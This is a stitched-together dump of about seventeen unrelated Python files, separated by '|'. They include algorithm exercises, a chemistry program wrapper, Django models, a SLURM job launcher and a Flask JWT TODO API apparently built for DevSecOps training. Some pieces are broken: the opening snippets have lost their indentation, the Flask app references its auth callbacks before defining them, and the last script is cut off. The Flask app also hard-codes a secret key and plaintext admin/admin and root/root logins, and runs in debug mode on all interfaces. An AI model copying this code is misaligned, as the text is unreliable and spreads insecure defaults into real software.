            elif t == '' and start >= i.start and end <= i.end:
                # Fully contained in i: i absorbs it unchanged.
                t = 'x'
                ans.append(i)
            elif t == '' and start > i.start:
                # Starts inside i, extends beyond: begin merging from i.start.
                t = 'i'
                newInterval.start = i.start
            elif t == '' and start <= i.start:
                # Starts before i and extends beyond it: begin merging.
                t = 'i'
            elif t == 'i' and end > i.end:
                # i is swallowed by the merge in progress.
                pass
            elif t == 'i' and end >= i.start and end <= i.end:
                # Merge ends inside i: close it at i.end.
                newInterval.end = i.end
                ans.append(newInterval)
                t = 'x'
            elif t == 'i':
                # Merge ended in the gap before i: place both.
                ans.append(newInterval)
                ans.append(i)
                t = 'x'
            elif t == 'x':
                # Already placed: copy the remainder verbatim.
                ans.append(i)
        if newInterval.end > intervals[-1].end:
            # New interval runs past the last original one.
            ans.append(newInterval)
        return ans
test = Solution()
i1 = Interval(2,4)
i2 = Interval(5,7)
i3 = Interval(8,10)
i4 = Interval(3,8)
for i in test.insert([i1, i2, i3], i4):
print i.start, i.end
print '---'
i1 = Interval(1,5)
i2 = Interval(1,5)
for i in test.insert([i1], i2):
print i.start, i.end
print '---'
i1 = Interval(2,3)
i2 = Interval(4,5)
i3 = Interval(6,7)
i4 = Interval(4,6)
for i in test.insert([i1, i2, i3], i4):
print i.start, i.end |
# Examples from Mining the Social Web, section 8
import webbrowser
import requests # pip install requests
from BeautifulSoup import BeautifulSoup # pip install BeautifulSoup
# XXX: Any URL containing a geo microformat...
URL = 'http://en.wikipedia.org/wiki/Kaunas'
req = requests.get(URL, headers={'User-Agent': "Mining the Social Web"})
soup = BeautifulSoup(req.text)
geoTag = soup.find(True, 'geo')
if geoTag and len(geoTag) > 1:
lat = geoTag.find(True, 'latitude').string
lon = geoTag.find(True, 'longitude').string
print 'Location is at', lat, lon
elif geoTag and len(geoTag) == 1:
(lat, lon) = geoTag.string.split(';')
(lat, lon) = (lat.strip(), lon.strip())
print 'Location is at', lat, lon
else:
print 'No location found'
google_maps_url = "http://maps.google.com/maps?q={0}+{1}&ie=UTF8&t=h&z=14&{0},{1}".format(lat, lon)
webbrowser.open(google_maps_url)
|
import subprocess
from io import StringIO
import numpy as np
from pyorca import orcaconfig as config
class OrcaWrapper:
    """Thin driver around the ORCA quantum-chemistry program.

    Builds input files, launches the orca executable and parses energies,
    geometries and Hessians back out of the job's output files.
    """

    def __init__(self, jobname, elements, theory, basis, *args, parallel=None):
        # elements: per-atom element symbols, in coordinate order.
        self.elements = elements
        self.jobname = jobname
        if 'mp2' in theory.lower():
            # MP2 jobs are run with all electrons correlated.
            args = (*args, 'nofrozencore')
        if theory.lower() == 'ri-mp2':
            # RI-MP2 additionally needs the /C auxiliary basis.
            basis = f'{basis} {basis}/C'
        # {job_type:} is filled in per-run by run_job().
        self.header = f'! {" ".join([theory, basis, *args])} bohrs verytightscf ' + '{job_type:}\n'
        if parallel is not None:
            self.header += f'%pal nprocs {parallel}\n end\n'

    def run_orca(self, input_str):
        """Write <jobname>.inp and run orca on it; raise on abnormal exit."""
        with open(f'{self.jobname}.inp', 'w') as f:
            f.write(input_str)
        args = [config.ORCA_EXEC, f'{self.jobname}.inp']
        with subprocess.Popen(args, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc:
            out = proc.stdout.read().decode()
        # ORCA signals success via this banner in stdout.
        if '****ORCA TERMINATED NORMALLY****' not in out:
            raise RuntimeError(out)
        return

    def write_coord_string(self, coords, charge, multiplicity):
        """Format coords (flat or (n,3), in Bohr per the header) as an
        ORCA `* xyz` block."""
        coords_str = f'* xyz {charge} {multiplicity}\n'
        coords_str += '\n'.join(
            f'{e} {x:20.12f} {y:20.12f} {z:20.12f}' for e, (x, y, z) in zip(self.elements, coords.reshape(-1, 3)))
        coords_str += '\n*\n'
        return coords_str

    def run_job(self, job_type, coords, charge=0, multiplicity=1):
        """Assemble the full input (header + coordinates) and run it."""
        input_str = self.header.format(job_type=job_type)
        input_str += self.write_coord_string(coords, charge, multiplicity)
        self.run_orca(input_str)

    def get_scf_energy(self, coords, charge=0, multiplicity=1):
        """Run a single-point job and return the last SCF energy found in
        the property file (None when absent)."""
        self.run_job('svp', coords, charge, multiplicity)
        properties = open(f'{self.jobname}_property.txt', 'r').readlines()
        scf = None
        for line in properties:
            if 'SCF Energy' in line:
                scf = float(line.strip().split()[-1])
        return scf

    def read_geometry(self):
        """Return the last !GEOMETRY! block of the property file as an
        (n_atoms, 3) array (None when no block is present)."""
        atoms = len(self.elements)
        lines = open(f'{self.jobname}_property.txt', 'r').readlines()
        x = None
        for i, line in enumerate(lines):
            if line == '------------------------ !GEOMETRY! -------------------------\n':
                # Coordinates start 3 lines after the banner.
                block = "".join(lines[i + 3:i + 3 + atoms])
                x = np.loadtxt(StringIO(block), usecols=(1, 2, 3))
        return x

    def optimize(self, coords, charge=0, multiplicity=1):
        """Geometry optimization; returns the final geometry divided by
        the Bohr radius in Angstrom (0.5291772083)."""
        self.run_job('verytightopt', coords, charge, multiplicity)
        return self.read_geometry() / 5.291772083e-1

    def generate_hessian_columns(self, size):
        """Parse <jobname>.hess: return (hessian, coords).

        The $hessian section stores the (size x size) matrix in
        column-blocks; blocks are stacked horizontally here.
        """
        lines = open(f'{self.jobname}.hess', 'r').readlines()
        start = lines.index('$hessian\n')
        end = lines.index('$vibrational_frequencies\n')
        hess_lines = lines[start + 2:end - 1]
        blocks = []
        while hess_lines:
            # Each block: one header row of column indices + `size` rows.
            block, hess_lines = hess_lines[:size + 1], hess_lines[size + 1:]
            block = "".join(block[1:])
            blocks.append(np.loadtxt(StringIO(block))[:, 1:])
        hess = np.hstack(blocks)
        start = lines.index('$atoms\n')
        end = lines.index('$actual_temperature\n')
        coords_lines = lines[start + 2:end - 1]
        coords = np.loadtxt(StringIO("".join(coords_lines)), usecols=(2, 3, 4))
        return hess, coords

    def get_hessian(self, coords, charge=0, multiplicity=1, opt=False):
        """Analytic-frequency job (optionally preceded by optimization).

        Returns the Hessian reshaped to (n, 3, n, 3); with opt=True also
        returns the optimized coordinates.
        """
        job_type = ('verytightopt ' if opt else '') + 'anfreq'
        n = coords.size // 3
        self.run_job(job_type, coords, charge, multiplicity)
        hess, x = self.generate_hessian_columns(coords.size)
        hess = hess.reshape((n, 3, n, 3,))
        if opt:
            return hess, x
        else:
            return hess
def main():
    """Smoke test: optimized Hessian of water at RHF/STO-3G."""
    elements = 'O H H'.split()
    pot = OrcaWrapper(jobname='job', elements=elements, theory='RHF', basis='sto-3g')
    # Dividing by 0.5291772083 converts the Angstrom values to Bohr,
    # matching the 'bohrs' keyword in the input header.
    coords = np.array([0.00000000000000, 0.00000000000000, 0.05568551114552,
                       0.00000000000000, 0.76411921207143, -0.54015925557276,
                       0.00000000000000, -0.76411921207143, -0.64015925557275]) / 5.291772083e-1
    hess, coords = pot.get_hessian(coords, opt=True)
    print(coords)

if __name__ == '__main__':
    main()
|
class Hero:
    """Simple RPG hero with a class-level counter of created instances."""

    # class variable: total number of Hero objects created so far
    jumlah_hero = 0

    def __init__(self, inputName, inputHealth, inputPower, inputArmor):
        # instance variables
        self.name = inputName
        self.health = inputHealth
        self.power = inputPower
        self.armor = inputArmor
        Hero.jumlah_hero = Hero.jumlah_hero + 1

    def siapa(self):
        """Void method (no return): introduce this hero by name."""
        print("namaku adalah " + self.name)

    def healthUp(self, up):
        """Method with an argument: raise health by `up`."""
        self.health = self.health + up

    def getHealth(self):
        """Method with a return value: current health."""
        return self.health
# Demo: create two heroes and exercise the health API.
hero1 = Hero("sniper", 100, 10, 5)
hero2 = Hero("mario bros", 90, 5, 10)
hero1.siapa()
hero1.healthUp(10)
# Bug fix: the original final line ended with a stray '|' (SyntaxError).
print(hero1.getHealth())
from django.db import models
from django.contrib.auth.models import AbstractUser
class TTUser(AbstractUser):
    """Custom user with a bio, a portrait and a derived display reference."""

    bio = models.TextField(max_length=500, blank=True)
    portrait = models.ImageField(upload_to='profile_pictures/')
    # Display name derived from first/last name (or username) on save().
    reference = models.CharField(max_length=50, default='User Reference')

    def __str__(self):
        return self.username

    def save(self, **kwargs):
        # Bug fix: the original's dangling else meant a user with a first
        # name but no last name fell back to the username, discarding the
        # first name.  Use whichever name parts exist, else the username.
        parts = [p for p in (self.first_name, self.last_name) if p]
        self.reference = " ".join(parts) if parts else self.username
        super().save(**kwargs)
|
from linkedlist import LinkedList
def delmiddle(n, i):
    """Delete the first node with value `i` from linked list `n`.

    Returns True when a node was removed (decrementing n.length),
    False when no node matched.
    """
    current = n.start
    prev = None
    while current:
        if current.value == i:
            if prev is None:
                # Bug fix: deleting the head crashed with AttributeError
                # (prev was None); relink the list head instead.
                n.start = current.next
            else:
                prev.next = current.next
            n.length -= 1
            return True
        prev = current
        current = current.next
    return False
# Demo: build a list of 7 values, delete one, print the lengths.
l= LinkedList()
l.append(1)
l.append(2)
l.append(3)
l.append(5)
l.append(3)
l.append(2)
l.append(10)
print(l.len())
delmiddle(l,10)
print(l.len())
# delmiddle(l,1)  # head deletion -- see delmiddle's prev handling
print(l)
|
import flask
from flask import request, jsonify
# from flaskext.mysql import MySQL
from flask_jwt import JWT, jwt_required
from werkzeug.security import safe_str_cmp
from flasgger import Swagger
# SQLITE3 setup for Flask
import sqlite3 as sql
app = flask.Flask(__name__)
app.config["DEBUG"] = True
# NOTE(review): hard-coded secret key -- load from the environment in
# anything beyond this training app.
app.config['SECRET_KEY'] = 'super-secret'
# NOTE(review): `authenticate` and `identity` are defined further down
# this module, so as written this line raises NameError at import time --
# confirm the original module ordering.
jwt = JWT(app, authenticate, identity)
"""
curl -d '{"username": "admin", "password":"admin"}' -H 'Content-Type: application/json' http://127.0.0.1:5000/auth -v
{
"access_token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6MiwiaWF0IjoxNjAxNzM2MjAyLCJuYmYiOjE2MDE3MzYyMDIsImV4cCI6MTYwMTczNjUwMn0.ywAwJEayJOOZ2s1Kk7y40n_v3rRX8H-2TYSM1hYXxRA"
}
curl http://127.0.0.1:5000/api/v1/resources/todos -v
curl -H 'Content-Type: application/json' -H 'Authorization: JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZGVudGl0eSI6MiwiaWF0IjoxNjAxNzUxMDY2LCJuYmYiOjE2MDE3NTEwNjYsImV4cCI6MTYwMTc1MTM2Nn0._5KmYgv2Alpp7OzDp_SvpZg7y5N7Lw6vV6Lm_o7aqgc' http://127.0.0.1:5000/api/v1/resources/todos
curl -d '{"username": "admin", "password":"admin"}' -H 'Content-Type: application/json' http://127.0.0.1:5000/auth -v
curl http://127.0.0.1:5000/api/v1/resources/todos -v
"""
DATABASE = 'todos.db'
class User(object):
    """In-memory user record used by the JWT callbacks."""

    def __init__(self, id, username, password):
        self.id = id
        self.username = username
        self.password = password

    def __str__(self):
        return "User(id='{0}')".format(self.id)
# Demo users.  NOTE(review): plaintext, hard-coded credentials -- only
# acceptable in this training application.
users = [
    User(1, 'root', 'root'),
    User(2, 'admin', 'admin'),
]
# Lookup tables consumed by the JWT callbacks below.
username_table = {u.username: u for u in users}
userid_table = {u.id: u for u in users}
def authenticate(username, password):
    """JWT auth callback: return the matching User on valid credentials,
    otherwise None."""
    user = username_table.get(username)
    if user is None:
        return None
    # Constant-time comparison of the stored and supplied passwords.
    if safe_str_cmp(user.password.encode('utf-8'), password.encode('utf-8')):
        return user
    return None
def identity(payload):
    """JWT identity callback: map a token payload to its User (or None)."""
    return userid_table.get(payload['identity'], None)
swagger = Swagger(app)
@app.route('/', methods=['GET'])
def home():
    # Landing page banner (no swagger spec on purpose).
    return "<h1>Practical DevSecOps TODOs API</h1>"
@app.route('/api/v1/resources/todos', methods=['GET'])
@jwt_required()
def get_all_todos():
    """Returns a list of todo item
    ---
    produces:
    - "application/json"
    responses:
      200:
        description: "list of tasks"
        schema:
          type: "array"
          items:
            $ref: "#/definitions/Task"
      400:
        description: "Invalid ID supplied"
      404:
        description: "todo item not found"
    """
    # Requires a valid JWT (see @jwt_required); rows are returned as raw
    # tuples straight from sqlite.
    with sql.connect("todos.db") as con:
        cursor = con.cursor()
        cursor.execute("SELECT * from todos")
        todos = cursor.fetchall()
        cursor.close()
    return jsonify(todos), 200
@app.route('/api/v1/resources/todos/<string:id>', methods=['GET'])
def get_todo(id):
    """Returns a todo item
    ---
    produces:
    - "application/json"
    parameters:
    - name: "id"
      in: "path"
      description: "ID of todo item to return"
      required: true
      type: "integer"
      format: "int64"
      default: all
    responses:
      200:
        description: "successful operation"
      schema:
          $ref: "#/definitions/Task"
      400:
        description: "Invalid ID supplied"
      404:
        description: "todo item not found"
    definitions:
      Task:
        type: "object"
        properties:
          id:
            type: "integer"
            format: "int64"
          user:
            type: "string"
          todo:
            type: "string"
          date:
            type: "string"
            format: date
    """
    # Fix: the original concatenated the user-supplied ``id`` straight into
    # the SQL text ("... where id=" + str(id)) -- a classic SQL injection.
    # A qmark placeholder lets sqlite3 bind the value safely.
    with sql.connect(DATABASE) as con:
        cursor = con.cursor()
        cursor.execute("SELECT * from todos where id=?", (id,))
        todo = cursor.fetchone()
        cursor.close()
    # fetchone() returns None when the id is unknown; jsonify(None) -> "null".
    return jsonify(todo), 200
@app.route('/api/v1/resources/todos', methods=['POST'])
def add_todo():
    """ Add a new task to the store
    ---
    consumes:
    - "application/json"
    produces:
    - "application/json"
    parameters:
    - in: "body"
      name: "body"
      description: "Task object that needs to be added to the store"
      required: true
      schema:
        $ref: "#/definitions/Task"
    responses:
      201:
        description: "Task added"
      405:
        description: "Invalid input"
    """
    todo = request.get_json()
    # Fix: the original interpolated request-controlled values into the SQL
    # string with str.format (SQL injection); bind them as parameters instead.
    # Debug prints of the raw payload/query removed.
    with sql.connect(DATABASE) as con:
        cursor = con.cursor()
        cursor.execute(
            "INSERT INTO todos(user, todo, date) VALUES(?, ?, ?)",
            (todo['user'], todo['todo'], todo['date']),
        )
        con.commit()
        cursor.close()
    # Echo the accepted payload back to the client.
    return jsonify(todo), 201
@app.route('/api/v1/resources/todos/<string:id>', methods=['PUT'])
def update_todo(id):
    """ Update an existing todo item
    ---
    consumes:
    - "application/json"
    produces:
    - "application/json"
    parameters:
    - name: "id"
      in: "path"
      description: "ID of todo item to return"
      required: true
      type: "integer"
      format: "int64"
    - in: "body"
      name: "body"
      description: "Task object that needs to be added to the store"
      required: true
      schema:
        $ref: "#/definitions/Task"
    responses:
      400:
        description: "Invalid ID supplied"
      404:
        description: "Task not found"
      405:
        description: "Validation exception"
    """
    todo = request.get_json()
    # Fix: both the UPDATE and the follow-up SELECT previously built their SQL
    # by interpolating request data and the path parameter (SQL injection);
    # use bound parameters throughout.  Debug print of the query removed.
    with sql.connect(DATABASE) as con:
        cursor = con.cursor()
        cursor.execute(
            "UPDATE todos set user=?, todo=?, date=? WHERE id=?",
            (todo['user'], todo['todo'], todo['date'], id),
        )
        con.commit()
        # Re-read the row so the response reflects what is now stored.
        cursor.execute("SELECT * from todos where id=?", (id,))
        todo = cursor.fetchone()
        cursor.close()
    return jsonify(todo), 200
@app.route('/api/v1/resources/todos/<int:id>', methods=['DELETE'])
def delete_todo(id):
    """summary: "Deletes a task"
    ---
    produces:
    - "application/json"
    parameters:
    - name: "id"
      in: "path"
      description: "Task id to delete"
      required: true
      type: "integer"
      format: "int64"
    responses:
      200:
        description: "Task deleted"
      400:
        description: "Invalid ID supplied"
      404:
        description: "Task not found"
    """
    # ``id`` is an int thanks to the <int:id> converter, but bind it anyway so
    # every handler uses parameterized SQL consistently (the original built
    # the DELETE by string concatenation).  Debug print removed.
    with sql.connect(DATABASE) as con:
        cursor = con.cursor()
        cursor.execute("DELETE FROM todos WHERE id=?", (id,))
        con.commit()
        cursor.close()
    # NOTE(review): a DELETE for a nonexistent id still reports success here.
    message = "Id: " + str(id) + " Deleted"
    json_message = {"message": message}
    return jsonify(json_message), 200
if __name__ == '__main__':
    # NOTE(review): binds to all interfaces with Flask DEBUG enabled --
    # acceptable for this DevSecOps training app only, never production.
    app.run(host='0.0.0.0')
|
# Package metadata and public re-exports for the top-level namespace.
__version__ = '0.5'
from .antenna import *
from .topica import TopicaResult
from .digital_twin import DigitalTwin
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-04-16 03:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a moderation ``status`` field to ``post.Article``."""

    dependencies = [
        ('post', '0001_initial'),
    ]
    operations = [
        migrations.AddField(
            model_name='article',
            name='status',
            # Choice labels are escaped Chinese strings:
            # 1 = "under review", 2 = "approved", 3 = "rejected";
            # verbose_name is "status".  New rows default to "under review".
            field=models.SmallIntegerField(choices=[(1, '\u6b63\u5728\u5ba1\u6838'), (2, '\u5ba1\u6838\u901a\u8fc7'), (3, '\u5ba1\u6838\u5931\u8d25')], default=1, verbose_name='\u72b6\u6001'),
        ),
    ]
|
# Example script to run methods on sample data
# Code modified from the version by Byron Yu byronyu@stanford.edu, John Cunningham jcunnin@stanford.edu
from extract_traj import extract_traj, mean_squared_error, goodness_of_fit_rsquared, getPredErrorVsDim
from data_simulator import load_data
import numpy as np
from core_gpfa.postprocess import postprocess
from core_gpfa.plot_3d import plot_3d, plot_1d, plot_1d_error
import matplotlib.pyplot as plt
# import matplotlib
# matplotlib.use('agg')
# plt.switch_backend('agg')
# set random seed for reproducibility
# np.random.seed(1)
# ---- Run configuration ----
RUN_ID = 1
OUTPUT_DIR = './output/'+str(RUN_ID)+'/'
x_dim = 8 # latent dimension for 'rbf'
# x_dim = 2 # for 'sm'
method = 'gpfa'
param_cov_type = 'rbf' # type of kernel: 'rbf' or 'sm'
param_Q = 2 # number of mixtures for SM
num_folds = 3 # change to n>=2 for n-fold cross-validation
kern_SD = 30  # NOTE(review): not referenced below -- confirm whether extract_traj expects it
INPUT_FILE = './input/fake_data_{}.mat'.format(param_cov_type)
# INPUT_FILE = '../em_input_new.mat'
# INPUT_FILE = '../dataForRoman_sort.mat'
# INPUT_FILE = '../fake_data2_w_genparams.mat' # '../em_input_new.mat', '../fake_data2_w_genparams.mat', '../fake_data_w_genparams.mat'
# Load data
dat = load_data(INPUT_FILE)
# Fit the model (cross-validation runs when num_folds >= 2).
result = extract_traj(output_dir=OUTPUT_DIR, data=dat, method=method, x_dim=x_dim,\
            param_cov_type=param_cov_type, param_Q = param_Q, num_folds = num_folds)
# Extract trajectories for different dimensionalities
# dims = [2, 5, 8]
# for x_dim in dims:
#     result = extract_traj(output_dir=OUTPUT_DIR, data=dat, method=method, x_dim=x_dim,\
#             param_cov_type=param_cov_type, param_Q = param_Q, num_folds = num_folds)
# Get leave-one-out prediction (see Yu et al., 2009 for details on GPFA reduced)
# gpfa_errs, gpfa_reduced_errs = getPredErrorVsDim(OUTPUT_DIR, method, param_cov_type, num_folds, dims)
# # Plotting can be done as follows:
# plt.plot(dims, gpfa_errs, '--k')
# plt.plot(np.arange(1,gpfa_reduced_errs.size+1),gpfa_reduced_errs)
# plt.xlabel('State dimensionality')
# plt.ylabel('Prediction error')
# Orthonormalize trajectories
# Returns results for the last run cross-validation fold, if enabled
(est_params, seq_train, seq_test) = postprocess(result['params'], result['seq_train'], result['seq_test'], method)
print("LL for training: %.4f, for testing: %.4f, method: %s, x_dim:%d, param_cov_type:%s, param_Q:%d"\
    % (result['LLtrain'], result['LLtest'], method, x_dim, param_cov_type, param_Q))
# Output filenames for plots
output_file = OUTPUT_DIR+"/"+method+"_xdim_"+str(x_dim)+"_cov_"+param_cov_type
# Plot trajectories in 3D space (needs at least 3 latent dimensions)
if x_dim >=3:
    plot_3d(seq_train, 'x_orth', dims_to_plot=[0,1,2], output_file=output_file)
# Plot each dimension of trajectory
# plot_1d(seq_train, 'x_sm', result['bin_width'], output_file=output_file)
plot_1d(seq_train, 'x_orth', result['bin_width'], output_file=output_file)
# Prediction error and extrapolation plots on test set
if len(seq_test)>0:
    # Change to 'x_orth' to get prediction error for orthogonalized trajectories
    mean_error_trials = mean_squared_error(seq_test, 'x_orth')
    print("Mean sequared error across trials: %.4f" % mean_error_trials)
    # NOTE(review): field name 'xsm' here vs 'x_sm' used above -- confirm the key.
    r2_trials = goodness_of_fit_rsquared(seq_test, x_dim, 'xsm')
    print("R^2 averaged across trials: %s" % np.array_str(r2_trials, precision=4))
    # # Plot each dimension of trajectory, test data
    # plot_1d(seq_test, 'x_orth', result['bin_width'])
    # Change to 'x_orth' to plot orthogonalized trajectories
    plot_1d_error(seq_test, 'x_orth', result['bin_width'], output_file=output_file)
# Plot all figures
plt.show()
# Cross-validation to find optimal state dimensionality
# TODO
from typing import List
class Solution:
    def coinChange(self, coins: List[int], amount: int) -> int:
        """Return the fewest coins from ``coins`` summing to ``amount``.

        Unbounded-knapsack DP over amounts 0..amount; unreachable amounts
        are kept at +inf.  Returns -1 when ``amount`` cannot be formed.
        """
        unreachable = float('inf')
        best = [unreachable] * (amount + 1)
        best[0] = 0  # zero coins make amount 0
        for coin in coins:
            for total in range(coin, amount + 1):
                candidate = best[total - coin] + 1
                if candidate < best[total]:
                    best[total] = candidate
        return -1 if best[amount] == unreachable else best[amount]
# Quick demo runs (executed on import).
print(Solution().coinChange([1, 2, 5], 11))
print(Solution().coinChange([2], 3))
|
"""Miscellaneous tools and shortcuts"""
from datetime import datetime
from functools import wraps
from dataclasses import asdict
from toolz import excepts
def onlyone(iterable):
    """Return the single element of *iterable*.

    Raises ValueError when the iterable yields zero or more than one item,
    via tuple-unpacking semantics.
    """
    [item] = iterable
    return item
def replace(instance, **kwargs):
    """Return a new instance of the same dataclass with fields overridden."""
    values = asdict(instance)
    values.update(kwargs)
    return type(instance)(**values)
def apply(func, args=(), kwargs=None):
    """Call *func* with positional *args* and optional keyword *kwargs*."""
    if not kwargs:
        kwargs = {}
    return func(*args, **kwargs)
def notnone(obj):
    """Tell whether *obj* is anything other than ``None``."""
    return obj is not None
class StrRepr():
    """Mixin that derives ``__repr__`` from the class's ``__str__``."""

    def __str__(self):
        return f'{type(self).__name__} object'

    def __repr__(self):
        return f'<{type(self).__name__}: {self}>'
class NO_DEFAULT:
    """Sentinel type marking "no default supplied" where None is a valid value."""
def lookup_defaults(lookup, default):
    """Wrap *lookup* so that a LookupError yields *default* instead."""
    fallback = lambda _exc: default
    return excepts(LookupError, lookup, fallback)
def skipnone(func):
    """Decorate *func* so a None argument short-circuits to None."""
    @wraps(func)
    def guarded(value):
        if value is None:
            return None
        return func(value)
    return guarded
def parse_iso8601(dtstring: str) -> datetime:
    """Naively parse an ISO-8601 datetime string.

    Two layouts are accepted, distinguished purely by length:

    * ``2017-11-20T07:16:29Z`` (20 chars, naive result)
    * ``2017-11-20T07:16:29+0000`` (aware result)
    """
    if len(dtstring) == 20:
        fmt = '%Y-%m-%dT%H:%M:%SZ'
    else:
        fmt = '%Y-%m-%dT%H:%M:%S%z'
    return datetime.strptime(dtstring, fmt)
|
# Read an n-by-n grid of 0/1 cells ("coloured paper" judge-style input).
n = int(input())
matrix = [list(map(int, input().split())) for _ in range(n)]
blue, white = 0,0 # counters for uniform blue (1) / white (0) squares
def square(x, y, n):
    # Quadtree count: classify the n-by-n sub-grid with top-left corner
    # (x, y) as one solid square, or split it into four quadrants and recurse.
    global matrix, blue, white
    check = True                  # stays True while the region looks uniform
    first_color = matrix[x][y]    # colour of the top-left cell
    for i in range(x, x+n):
        if not check: break       # mismatch found earlier; recursion already done
        for j in range(y, y+n):
            if matrix[i][j] != first_color:
                check = False
                # Mixed region: recurse into the four half-size quadrants.
                k = n//2
                square(x, y, k)
                square(x+k, y, k)
                square(x, y+k, k)
                square(x+k, y+k, k)
                break             # leave inner loop; outer loop exits via check
    if check:
        # Uniform region: credit exactly one square of its colour.
        if first_color == 1:
            blue += 1
            return
        elif first_color == 0:
            white += 1
            return
# Classify the whole grid, then report white count before blue count.
square(0, 0, n)
print(f'{white}\n{blue}')
|
from setuptools import setup, find_packages
# Execute version.py so __version__ is defined here without importing the
# package itself (which may have unmet dependencies at build time).
exec(open("./src/pytest_vts/version.py").read())
with open("PyPI_LONGDESC.rst") as fd:
    long_description = fd.read()
keywords = ("pytest plugin http stub mock record responses recorder "
            "vcr betamax automatic")
setup(
    name="pytest-vts",
    version=__version__, # noqa
    packages=find_packages("src"),
    package_dir={"": "src"},
    install_requires=[
        "pytest >=2.3",
        "responses",
        "cookies",
        "six",
        # NOTE(review): presumably pins around an urllib3/responses
        # incompatibility in 1.25.0-1.25.2 -- confirm before relaxing.
        "urllib3 !=1.25.0,!=1.25.1,!=1.25.2"
    ],
    entry_points={
        # Registers the plugin with pytest's plugin-discovery entry point.
        "pytest11": [
            "pytest_vts = pytest_vts"
        ],
    },
    # metadata for upload to PyPI
    author="Bogdan Hodorog",
    author_email="bogdan.hodorog@gmail.com",
    description="pytest plugin for automatic recording of http stubbed tests",
    long_description=long_description,
    license="MIT",
    keywords=keywords,
    classifiers=["Framework :: Pytest"],
    project_urls={
        'Bug Reports': 'https://github.com/bhodorog/pytest-vts/issues',
        'Source': 'https://github.com/bhodorog/pytest-vts',
    },
)
|
# This program solves Ackermann's function
# Ackermann's function
def ackermann(m, n):
    """Compute the two-argument Ackermann function A(m, n).

    Defined for non-negative integers; grows explosively, so keep m small.
    """
    if m == 0:
        return n + 1
    if n == 0:
        return ackermann(m - 1, 1)
    return ackermann(m - 1, ackermann(m, n - 1))
# The main function
def main():
    # Demo entry point: evaluate and print A(2, 5).
    print(ackermann(2, 5))
# Call the main function (runs on import; no __main__ guard in the original)
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 8 12:42:19 2020
@author: tomasla
"""
from optimize import optimize
import argparse
import os
import time
# %% ArgParse
# CLI for a single optimization run, or for fanning out several SLURM jobs.
parser = argparse.ArgumentParser('Gradient Descent based Structure Optimization')
parser.add_argument('-d', '--domain', metavar='', required=True, help='Domain Name')
parser.add_argument('-n', '--numoptim', type=int, metavar='', required=False, help='Send "n" different jobs to cluster with different random states', default=0)
parser.add_argument('-s', '--structurepath', metavar='', required=False, help='path where Structure is saved. If not provided a new object is created', default='')
# NOTE(review): help text below says 'Domain Name' -- copy/paste slip; the
# option is the random seed.  (Help strings are runtime output, so only flagged.)
parser.add_argument('-r', '--randomstate', type=int, metavar='', required=False, help='Domain Name', default=1)
parser.add_argument('-o', '--outputdir', metavar='', required=False, help='Directory where the output should be saved', default='./')
parser.add_argument('-i', '--iterations', type=int, metavar='', required=False, help='Number of iterations', default=100)
parser.add_argument('-ap', '--anglepotential', metavar='', required=False, help='If angle potential should be used for the calculation of Loss', default='True')
parser.add_argument('-lr', '--learningrate', type=float, metavar='', required=False, help='Learning rate', default=1.0)
parser.add_argument('-ld', '--lrdecay', type=float, metavar='', required=False, help='Learning rate decay parameter', default=1.0)
parser.add_argument('-f', '--decayfrequency', type=int, metavar='', required=False, help='Learning rate Decay frequency', default=100)
parser.add_argument('-m', '--momentum', type=float, metavar='', required=False, help='momentum parameter', default=0.0)
parser.add_argument('-nm', '--nesterov', metavar='', required=False, help='Nesterov Momentum', default='False')
parser.add_argument('-v', '--verbose', type=int, metavar='', required=False, help='How often should the program print info about losses. Default=iterations/20', default=-1)
args = parser.parse_args()
# %%
if __name__ == '__main__':
    if args.numoptim == 0:
        # Single local run.
        # NOTE(review): args.anglepotential is NOT forwarded here (it is only
        # passed in the sbatch branch) -- confirm optimize()'s default matches.
        # NOTE(review): nesterov arrives as the *string* 'False', which is
        # truthy -- verify optimize() parses string flags.
        optimize(domain=args.domain,
                 structure_path=args.structurepath,
                 random_state=args.randomstate,
                 output_dir=args.outputdir,
                 iterations=args.iterations,
                 lr=args.learningrate,
                 lr_decay=args.lrdecay,
                 decay_frequency=args.decayfrequency,
                 momentum=args.momentum,
                 nesterov=args.nesterov,
                 verbose=args.verbose
                 )
    else:
        # Fan out: write one sbatch script per random state and submit it.
        os.system(f"mkdir -p {args.outputdir}/temp_{args.domain}")
        os.system(f"mkdir {args.outputdir}/{args.domain}")
        for i in range(args.numoptim):
            with open(f'{args.outputdir}/temp_{args.domain}/{args.domain}_{i}.sh', 'w') as f:
                f.write('#!/bin/bash\n')
                f.write('#SBATCH --mem=4g\n')
                f.write('#SBATCH -t 1000\n')
                f.write(f'#SBATCH -o ../../steps/garbage/{args.domain}-%j.out\n')
                f.write(f'python3 optimize_script.py -d {args.domain} -r {i} -o {args.outputdir}/{args.domain} -i {args.iterations} -ap {args.anglepotential} -lr {args.learningrate} -ld {args.lrdecay} -f {args.decayfrequency} -m {args.momentum} -nm {args.nesterov} -v {args.verbose}')
            os.system(f"sbatch {args.outputdir}/temp_{args.domain}/{args.domain}_{i}.sh")
|
###################################################
## sobel.py : utility script for applying a sobel filter to all images in a folder
## @author Luc Courbariaux 2018
###################################################
import argparse
parser = argparse.ArgumentParser(description='gets all images in INPUT folder, applies a sobel filter them and puts them in OUTPUT directory.')
parser.add_argument('-i', '--input', nargs='?', default="./", help='folder from which the images')
parser.add_argument('-o', '--output', nargs='?', default="./dataset/", help='folder to store the images')
args = parser.parse_args()
import os
import numpy
from PIL import Image
import scipy
from scipy import ndimage
# Renamed from ``input``/``output``: the original shadowed the built-in input().
input_dir = args.input
output_dir = args.output
# Fix: the original wrapped os.mkdir in a bare ``except: pass``, which would
# also swallow permission errors; exist_ok covers the intended case only.
os.makedirs(output_dir, exist_ok=True)
for file in os.listdir(input_dir):
    # sobel filter
    # based on https://stackoverflow.com/questions/7185655
    if file.endswith((".jpg", ".bmp")):
        # Fix: scipy.misc.imread was removed in SciPy 1.2; load through the
        # already-imported PIL instead.
        im = numpy.asarray(Image.open(os.path.join(input_dir, file)))
        im = im.astype('int32')
        dx = ndimage.sobel(im, 0)  # horizontal derivative
